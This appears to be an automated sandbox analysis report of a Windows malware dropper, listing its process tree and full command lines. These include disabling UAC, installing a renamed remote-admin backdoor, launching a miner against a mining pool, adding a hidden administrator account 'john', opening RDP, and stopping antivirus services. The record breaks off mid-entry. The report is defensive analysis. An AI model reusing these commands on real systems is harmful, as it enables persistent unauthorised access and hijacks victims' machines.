LtHv0O2KZDK4M637.exewini.exeWScript.execmd.exerutserv.exesys.execmd.exewinit.exeWinMail.exe

description	pid	process	target process
PID 1192 wrote to memory of 912	1192	LtHv0O2KZDK4M637.exe	wini.exe
PID 1192 wrote to memory of 912	1192	LtHv0O2KZDK4M637.exe	wini.exe
PID 1192 wrote to memory of 912	1192	LtHv0O2KZDK4M637.exe	wini.exe
PID 912 wrote to memory of 2912	912	wini.exe	WScript.exe
PID 912 wrote to memory of 2912	912	wini.exe	WScript.exe
PID 912 wrote to memory of 2912	912	wini.exe	WScript.exe
PID 912 wrote to memory of 2176	912	wini.exe	winit.exe
PID 912 wrote to memory of 2176	912	wini.exe	winit.exe
PID 912 wrote to memory of 2176	912	wini.exe	winit.exe
PID 2912 wrote to memory of 3556	2912	WScript.exe	cmd.exe
PID 2912 wrote to memory of 3556	2912	WScript.exe	cmd.exe
PID 2912 wrote to memory of 3556	2912	WScript.exe	cmd.exe
PID 3556 wrote to memory of 2060	3556	cmd.exe	regedit.exe
PID 3556 wrote to memory of 2060	3556	cmd.exe	regedit.exe
PID 3556 wrote to memory of 2060	3556	cmd.exe	regedit.exe
PID 3556 wrote to memory of 1428	3556	cmd.exe	regedit.exe
PID 3556 wrote to memory of 1428	3556	cmd.exe	regedit.exe
PID 3556 wrote to memory of 1428	3556	cmd.exe	regedit.exe
PID 3556 wrote to memory of 2204	3556	cmd.exe	timeout.exe
PID 3556 wrote to memory of 2204	3556	cmd.exe	timeout.exe
PID 3556 wrote to memory of 2204	3556	cmd.exe	timeout.exe
PID 3556 wrote to memory of 3628	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 3628	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 3628	3556	cmd.exe	rutserv.exe
PID 1192 wrote to memory of 2972	1192	LtHv0O2KZDK4M637.exe	sys.exe
PID 1192 wrote to memory of 2972	1192	LtHv0O2KZDK4M637.exe	sys.exe
PID 1192 wrote to memory of 2972	1192	LtHv0O2KZDK4M637.exe	sys.exe
PID 3556 wrote to memory of 504	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 504	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 504	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 696	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 696	3556	cmd.exe	rutserv.exe
PID 3556 wrote to memory of 696	3556	cmd.exe	rutserv.exe
PID 2276 wrote to memory of 2272	2276	rutserv.exe	rfusclient.exe
PID 2276 wrote to memory of 2272	2276	rutserv.exe	rfusclient.exe
PID 2276 wrote to memory of 2272	2276	rutserv.exe	rfusclient.exe
PID 2276 wrote to memory of 2072	2276	rutserv.exe	rfusclient.exe
PID 2276 wrote to memory of 2072	2276	rutserv.exe	rfusclient.exe
PID 2276 wrote to memory of 2072	2276	rutserv.exe	rfusclient.exe
PID 3556 wrote to memory of 3712	3556	cmd.exe	attrib.exe
PID 3556 wrote to memory of 3712	3556	cmd.exe	attrib.exe
PID 3556 wrote to memory of 3712	3556	cmd.exe	attrib.exe
PID 3556 wrote to memory of 3796	3556	cmd.exe	attrib.exe
PID 3556 wrote to memory of 3796	3556	cmd.exe	attrib.exe
PID 3556 wrote to memory of 3796	3556	cmd.exe	attrib.exe
PID 3556 wrote to memory of 2372	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2372	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2372	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2780	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2780	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2780	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2012	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2012	3556	cmd.exe	sc.exe
PID 3556 wrote to memory of 2012	3556	cmd.exe	sc.exe
PID 2972 wrote to memory of 3504	2972	sys.exe	cmd.exe
PID 2972 wrote to memory of 3504	2972	sys.exe	cmd.exe
PID 2972 wrote to memory of 3504	2972	sys.exe	cmd.exe
PID 3504 wrote to memory of 3452	3504	cmd.exe	timeout.exe
PID 3504 wrote to memory of 3452	3504	cmd.exe	timeout.exe
PID 3504 wrote to memory of 3452	3504	cmd.exe	timeout.exe
PID 2176 wrote to memory of 428	2176	winit.exe	WinMail.exe
PID 2176 wrote to memory of 428	2176	winit.exe	WinMail.exe
PID 2176 wrote to memory of 428	2176	winit.exe	WinMail.exe
PID 428 wrote to memory of 2872	428	WinMail.exe	WinMail.exe

System policy modification 1 TTPs 3 IoCs

evasion

TTPs:

Modify Registry

Processes:

LtHv0O2KZDK4M637.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	LtHv0O2KZDK4M637.exe

Views/modifies file attributes 1 TTPs 31 IoCs

evasion

TTPs:

Hidden Files and Directories

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
5164	attrib.exe
5432	attrib.exe
4196	attrib.exe
4240	attrib.exe
5260	attrib.exe
1264	attrib.exe
5168	attrib.exe
5732	attrib.exe
5352	attrib.exe
1156	attrib.exe
5548	attrib.exe
5536	attrib.exe
1452	attrib.exe
5672	attrib.exe
5564	attrib.exe
3712	attrib.exe
812	attrib.exe
5480	attrib.exe
5516	attrib.exe
2784	attrib.exe
5492	attrib.exe
5220	attrib.exe
1124	attrib.exe
3796	attrib.exe
5396	attrib.exe
5040	attrib.exe
1636	attrib.exe
1688	attrib.exe
2052	attrib.exe
1444	attrib.exe
5820	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe

"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"

Drops file in Drivers directory
Adds Run key to start application
Checks whether UAC is enabled
Modifies WinLogon
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification

PID:1192

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

Executes dropped EXE
Modifies registry class
Suspicious use of WriteProcessMemory

PID:912

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

Suspicious use of WriteProcessMemory

PID:2912

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

Suspicious use of WriteProcessMemory

PID:3556

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

Runs .reg file with regedit

PID:2060

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

Runs .reg file with regedit

PID:1428

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:2204

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:3628

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:504

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:696

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

Views/modifies file attributes

PID:3712

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

Views/modifies file attributes

PID:3796

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

PID:2372

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

PID:2780

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

PID:2012

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

Executes dropped EXE
Checks processor information in registry
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:2176

C:\Program Files (x86)\Windows Mail\WinMail.exe

"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE

Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:428

C:\Program Files\Windows Mail\WinMail.exe

"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

Suspicious use of SetWindowsHookEx

PID:2872

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

PID:3920

C:\Windows\SysWOW64\timeout.exe

timeout 5

Delays execution with timeout.exe

PID:1268

C:\ProgramData\install\sys.exe

C:\ProgramData\install\sys.exe

Executes dropped EXE
Loads dropped DLL
Checks processor information in registry
Suspicious use of WriteProcessMemory

PID:2972

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"

Suspicious use of WriteProcessMemory

PID:3504

C:\Windows\SysWOW64\timeout.exe

C:\Windows\system32\timeout.exe 3

Delays execution with timeout.exe

PID:3452

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

Executes dropped EXE

PID:2196

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

Drops file in Drivers directory
Executes dropped EXE
Drops file in Program Files directory
Drops file in Windows directory
Suspicious use of SetWindowsHookEx

PID:1696

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Executes dropped EXE
Adds Run key to start application
NTFS ADS
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx

PID:1296

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:1732

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

PID:3176

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

PID:200

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

PID:4616

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

Gathers network information

PID:4660

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

PID:4776

C:\Windows\system32\gpupdate.exe

gpupdate /force

PID:4848

C:\ProgramData\WindowsTask\audiodg.exe

C:\ProgramData\WindowsTask\audiodg.exe

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:2428

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:5208

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

PID:2164

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

PID:204

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

PID:1744

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

PID:376

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

PID:744

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

Modifies file permissions

PID:3924

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

Executes dropped EXE
Modifies registry class
Suspicious use of SetWindowsHookEx

PID:360

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

PID:208

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

Modifies registry class

PID:1256

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill

PID:1288

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill

PID:2016

C:\Windows\SysWOW64\timeout.exe

timeout 3

Delays execution with timeout.exe

PID:3968

C:\Windows\SysWOW64\chcp.com

chcp 1251

PID:4312

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

Executes dropped EXE

PID:4332

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill

PID:4500

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:4552

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

PID:5048

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

PID:2640

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

PID:4192

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

PID:4208

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

PID:1408

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

PID:4352

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

PID:4424

C:\Windows\SysWOW64\chcp.com

chcp 1251

PID:4524

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

PID:4540

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

PID:4600

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

PID:4680

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

PID:4620

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

PID:4740

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

PID:4672

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

PID:3768

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

PID:4836

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

PID:4772

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

PID:4792

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

PID:2340

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

PID:4952

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

PID:4908

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

PID:4988

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

PID:5100

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

PID:4112

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

PID:5116

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

PID:4132

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

Executes dropped EXE
Modifies WinLogon
Drops file in Program Files directory

PID:4224

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

PID:4788

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

Executes dropped EXE

PID:4480

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

PID:4704

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

PID:4624

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

PID:5016

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

Drops file in Program Files directory
Views/modifies file attributes

PID:4196

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

Drops file in Program Files directory
Views/modifies file attributes

PID:4240

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

Views/modifies file attributes

PID:812

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:5064

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

PID:1760

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

PID:4100

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

PID:4120

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

PID:4164

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

PID:4184

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

PID:4228

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

PID:4248

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

PID:4292

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

PID:4360

C:\Windows\SysWOW64\sc.exe

sc delete swprv

PID:4460

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

PID:4372

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

PID:4472

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

PID:4532

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

PID:4596

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

PID:4668

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

PID:4724

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

PID:4744

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

PID:4828

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

PID:4896

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

PID:4940

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

PID:4960

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

PID:5012

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

PID:4108

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

PID:4156

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

PID:3776

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

PID:4320

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

PID:1048

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

PID:4340

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

PID:4464

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

PID:4392

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

PID:4536

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

PID:4636

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

PID:4920

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

PID:5004

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

PID:4180

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

PID:4264

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

PID:4384

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

PID:4492

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

PID:4344

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

PID:4400

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

PID:4276

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

PID:4676

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

PID:4512

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

PID:4572

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

PID:4736

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

PID:4928

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

PID:4588

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

PID:4992

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:5092

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:2388

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:3820

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:4316

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4152

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4404

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:4592

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:4800

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:4644

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:4428

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4456

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4948

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

PID:724

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

PID:4784

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

PID:4980

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

PID:2408

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

PID:5104

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

PID:768

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

PID:4300

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

PID:4604

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

PID:4696

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

PID:4924

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

PID:5080

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

PID:4756

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

PID:5036

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

PID:4204

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

PID:992

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

PID:4432

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

PID:196

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

PID:5044

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

PID:4860

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

PID:5088

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

PID:4488

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

PID:5084

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

PID:4856

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

PID:4416

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

PID:4760

C:\Windows\SysWOW64\netsh.exe

